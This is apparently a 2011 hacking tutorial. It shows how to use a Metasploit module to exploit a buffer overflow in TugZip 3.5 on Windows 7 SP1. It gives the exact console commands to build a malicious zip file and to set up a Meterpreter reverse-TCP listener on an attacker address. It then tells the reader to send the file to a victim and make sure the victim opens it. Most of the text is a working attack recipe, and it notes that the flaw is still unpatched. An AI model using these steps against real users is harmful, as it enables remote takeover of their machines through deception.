Type : Tutorial
Level : Medium
Attacker O.S : Backtrack 5 R1
Victim O.S : Windows 7 SP1
Tested Vulnerable Application : TugZip 3.5
Exploit Credit : Stefan Marin, Lincoln, TecR0c, mr_me
This Hacking Windows 7 SP1 I wrote after surfing around metasploit and then found this exploit :-).
According to metasploit.com about this exploit :
This module exploits a stack-based buffer overflow vulnerability in the latest version 3.5 of TugZip archiving utility. In order to trigger the vulnerability, an attacker must convince someone to load a specially crafted zip file with TugZip by double click or file open. By doing so, an attacker can execute arbitrary code as the victim user.
Don't wait too long, let's try this in your personal lab by using virtual machine.
1. TugZip 3.5
2. TugZip Exploit (download link)
3. Metasploit Framework
Attacker IP Address : 192.168.8.93
Victim IP Address : 192.168.8.91
1. Download TugZip from the mediafire link above and install it in victim computer(testing purposes)
2. Open Metasploit console by running msfconsole command and then update it first using msfupdate command to update the library. If you didn't have internet connection to update the library, you can download the exploit above and then put it in /pentest/exploits/framework/modules/exploit/windows/fileformat/
Use the exploit and then set up the payload(see picture below)
3. The next step you need to configure the needed switch in this exploit to match your needs. To view all available switch just run show options command.
set filename h0T-clipS.zip --> set up your desired filename for the malicious file set lhost 192.168.8.93 --> set up the local address to connect back to payload when exploit successfully triggered set lport 443 --> our local port to receive connection from victim exploit --> generate the malicious file with payload /root/.msf4/data/exploits/h0T-clipS.zip --> the malicious file stored in this location
4. The next step we need to set up a listener to handle reverse connection from our exploit(if it's successfully triggered)
use exploit/multi/handler --> set up handler to handle connection to our machine set payload/windows/meterpreter/reverse_tcp --> make this same with the payload we've already been set up above set lhost 192.168.8.93 --> make this same with the ip we've already been set up above set lport 443 --> make this same with the local port we've already been set up above exploit --> start listen for incoming connection
5. After everything has been set up, we need to send the malicious file in step 3 to victim and make sure victim opened that file. After victim opened our malicious file, our metasploit console will have an active session of victim system.
1. Until I'm wrote this tutorial(2011-10-15) the status still zeroday a.k.a no cure.
Hope it's useful 🙂